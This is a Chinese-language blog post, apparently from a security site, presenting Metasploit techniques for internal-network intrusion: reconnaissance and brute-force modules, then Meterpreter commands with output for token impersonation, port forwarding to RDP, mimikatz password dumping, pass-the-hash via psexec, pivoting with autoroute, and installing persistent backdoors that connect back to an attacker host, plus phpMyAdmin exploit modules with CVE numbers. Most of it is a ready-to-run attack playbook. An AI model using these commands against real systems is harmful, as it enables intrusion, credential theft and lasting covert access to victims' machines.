SOCSEC

Metasploit的那些骚包姿势

1. 信息搜集

信息搜集的重要性在这里就不多说了,进入内网以后,首先进行信息搜集,可以使用auxiliary下的模块来进行。

*搜集主机信息:
使用auxiliary/scanner/discovery/下模块进行扫描:
模块有:

1
2
3
4
5
6
7
use auxiliary/scanner/discovery/arp_sweep
use auxiliary/scanner/discovery/empty_udp
use auxiliary/scanner/discovery/ipv6_multicast_ping
use auxiliary/scanner/discovery/ipv6_neighbor
use auxiliary/scanner/discovery/ipv6_neighbor_router_advertisement
use auxiliary/scanner/discovery/udp_probe
use auxiliary/scanner/discovery/udp_sweep

如:
图1
图2

*探测主机端口:
使用auxiliary/scanner/portscan/下的模块探测主机端口。
模块有:

1
2
3
4
5
auxiliary/scanner/portscan/ack //ACK防火墙扫描
auxiliary/scanner/portscan/ftpbounce// FTP跳端口扫描
auxiliary/scanner/portscan/syn //SYN端口扫描
auxiliary/scanner/portscan/tcp //TCP端口扫描
auxiliary/scanner/portscan/xmas //TCP”XMas”端口扫描

如:
图3

*使用auxiliary/scanner/smb/下的模块来识别搜集windows信息:
模块有:

1
2
3
4
5
6
7
8
9
10
11
12
auxiliary/scanner/smb/pipe_auditor
auxiliary/scanner/smb/pipe_dcerpc_auditor //返回DCERPC信息
auxiliary/scanner/smb/psexec_loggedin_users
auxiliary/scanner/smb/smb2 //扫描SMB2协议
auxiliary/scanner/smb/smb_enum_gpp
auxiliary/scanner/smb/smb_enumshares //扫描smb共享文件
auxiliary/scanner/smb/smb_enumusers //smb枚举系统用户
auxiliary/scanner/smb/smb_enumusers_domain
auxiliary/scanner/smb/smb_login //SMB登录
auxiliary/scanner/smb/smb_lookupsid //扫描组的用户
auxiliary/scanner/smb/smb_uninit_cred
auxiliary/scanner/smb/smb_version //扫描系统版本

*使用auxiliary/scanner/mssql/下的模块探测SQL server的信息
模块有:

1
2
3
4
auxiliary/scanner/mssql/mssql_hashdump //dump密码hash
auxiliary/scanner/mssql/mssql_login //密码爆破
auxiliary/scanner/mssql/mssql_ping //嗅探
auxiliary/scanner/mssql/mssql_schemadump

*使用auxiliary/scanner/ssh/下的模块探测ssh信息:
模块有:

1
2
3
4
5
6
7
auxiliary/scanner/ssh/cerberus_sftp_enumusers
auxiliary/scanner/ssh/detect_kippo
auxiliary/scanner/ssh/ssh_enumusers //枚举用户
auxiliary/scanner/ssh/ssh_identify_pubkeys
auxiliary/scanner/ssh/ssh_login //密码爆破
auxiliary/scanner/ssh/ssh_login_pubkey
auxiliary/scanner/ssh/ssh_version //查看版本

*使用auxiliary/scanner/ftp/下的模块探测ftp信息:
模块有:

1
2
3
4
5
6
7
auxiliary/scanner/ftp/anonymous
auxiliary/scanner/ftp/bison_ftp_traversal
auxiliary/scanner/ftp/ftp_login //密码爆破
auxiliary/scanner/ftp/ftp_version //查看版本
auxiliary/scanner/ftp/konica_ftp_traversal
auxiliary/scanner/ftp/pcman_ftp_traversal
auxiliary/scanner/ftp/titanftp_xcrc_traversal

*使用auxiliary/scanner/mysql/下的模块探测mysql信息:

1
2
3
4
5
6
auxiliary/scanner/mysql/mysql_authbypass_hashdump
auxiliary/scanner/mysql/mysql_file_enum
auxiliary/scanner/mysql/mysql_hashdump //dump密码hash
auxiliary/scanner/mysql/mysql_login //密码爆破
auxiliary/scanner/mysql/mysql_schemadump
auxiliary/scanner/mysql/mysql_version //查看版本

*在msfconsle 中使用nmap:
db_nmap是nmap的一个封装,其扫描结果存放在数据库,方便metasploit使用
db_nmap -sS -A 192.168.xx.xx
图4
使用db_services命令查看存储在数据库中的扫描结果。

2. 内网渗透

*查看是不是虚拟机:
运行命令:

1
meterpreter > run post/windows/gather/checkvm

*令牌劫持
得到会话后首先看了下有哪些令牌可以盗取.首先我们要载入incognito模块.然后执行list_tokens–u命令查看有哪些存在令牌。

之后我们尝试一下劫持令牌:
impersonate_token <用户:例如NT AUTHORITY\SYSTEM>

*端口转发
主机处于内网也是比较常见的,metasploit自带了一个端口转发工具

1
2
3
4
5
6
7
8
9
10
meterpreter > portfwd -h
Usage: portfwd [-h] [add | delete | list | flush] [args]
OPTIONS:
-L <opt> The local host to listen on (optional).
-h Help banner.
-l <opt> The local port to listen on.
-p <opt> The remote port to connect to.
-r <opt> The remote host to connect to.

1
2
3
4
5
meterpreter > portfwd add -L 1234 -p 3389 -r 192.168.32.133
[-] You must supply a local port, remote host, and remote port.
meterpreter > portfwd add -l 1234 -p 3389 -r 192.168.32.133
[*] Local TCP relay created: 0.0.0.0:1234 <-> 192.168.32.133:3389
meterpreter >

接下来再本机运行:

1
rdesktop -u zero -p haizeiwang123_ 127.0.0.1:1234

*获取密码
mimikatz可以直接获得操作系统的明文密码,meterpreter添加了这个模块。
首先加载mimikatz模块:

1
2
meterpreter > load mimikatz
Loading extension mimikatz...success.

获取密码hash密码:

1
meterpreter > msv

获取明文密码:

1
meterpreter > kerberos

*使用hash直接登录系统

1
2
3
4
5
6
7
8
9
10
11
12
13
use windows/smb/psexec
set SMBUser username
set SMBPass 用户密码的hash值
set payload Windows/meterpreter/reverse_tcp
set rhost 333.333.333.333
set lhost 111.111.111.111
exploit

*通过跳板机渗透
在获取到跳板机一定权限后,开始进一步渗透:
1.查看机器ip况:

1
meterpreter > ipconfig /all

获取本地网络分配情:

1
run get_local_subnets

2.添加本地网关和ip地址,在session里面创建虚拟路由功能

1
run autoroute -s 192.168.0.0/24 //子网段

查看分配的ip情况:

1
run autoroute -p

这是在metasploit中最常用的方法,在添加路由表和session的关系后,便可以使用msf中的模块跨网段扫描或攻击。方法有很多,这里有个脚本autoroute可以快速添加路由表(如上图),也可以将当前session置于后台(backgroud),然后用route命令添加。

*安装后门(windows下)
metasploit自带的后门有两种方式启动的,一种是通过服务启动(metsvc),一种是通过启动项启动(persistence) 优缺点各异

方法一:persistence方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-L <opt> Location in target host where to write payload to, if none %TEMP% will be used.
-P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-T <opt> Alternate executable template to use
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter >

执行:

1
meterpreter > run persistence -X -i 10 -p 2241 -r 192.168.111.129

结果:

1
2
3
4
5
6
7
8
9
10
[*] Running Persistance Script
[*] uploads file for cleanup created at /root/.msf4/logs/persistence/WIN-K30V5SI0PCE_20140313.5419/WIN-K30V5SI0PCE_20140313.5419.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.111.129 LPORT=2241
[*] Persistent agent script is 148439 bytes long
[+] Persistent Script written to C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
[*] Executing script C:UsersADMINI~1AppDataLocalTempUhyxOTTzTb.vbs
[+] Agent executed with PID 2916
[*] Installing into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ
[+] Installed into autorun as HKLM\Software\Microsoft\Windows\Current\Version\Run\HstWtPyXHYnhQ
meterpreter >

方法二:metsvc的方法。
设置后门:

1
meterpreter > run metsvc
1
2
3
4
5
6
7
8
9
10
11
[*] Creating a meterpreter service on port 31337
[*] Creating a temporary installation directory C:\Users\ADMINI~1\AppData\LocalTemp\HzWbqqRpuBlxn...
[*] >> Uploading metsrv.x86.dll...
[*] >> Uploading metsvc-server.exe...
[*] >> Uploading metsvc.exe...
[*] Starting the service...
* Installing service metsvc
* Starting service
Service metsvc successfully installed.
meterpreter >

再次链接:

1
2
3
msf > use multi/handler
msf exploit(handler) > set PAYLOAD windows/metsvc_bind_tcp
PAYLOAD => windows/metsvc_bind_tcp

方法三:这个是类似于添加账户3389远程连接

1
meterpreter > run getgui -u zero -p 密码
  1. phpMyadmin漏洞利用总结
    一:
    影响版本:3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3
    概述:PhpMyAdmin存在PREG_REPLACE_EVAL漏洞
    利用模块:exploit/multi/http/phpmyadmin_preg_replace
    CVE: CVE-2013-3238

二:
影响版本:phpMyAdmin v3.5.2.2
概述:PhpMyAdmin存在server_sync.php 后门漏洞
利用模块:exploit/multi/http/phpmyadmin_3522_backdoor
CVE: CVE-2012-5159

三:
影响版本: 2.11.x < 2.11.9.5 and 3.x < 3.1.3.1;
概述:PhpMyAdmin配置文件/config/config.inc.php存在命令执行
利用模块:exploit/unix/webapp/phpmyadmin_config
CVE: CVE-2009-1151

总结:

以上总结是参考乌云和freebuf上的大牛的利用案例或教程总结的,其中本人也自己验证了一些,由于太年轻,还是小菜,不足之处,请大神指正!!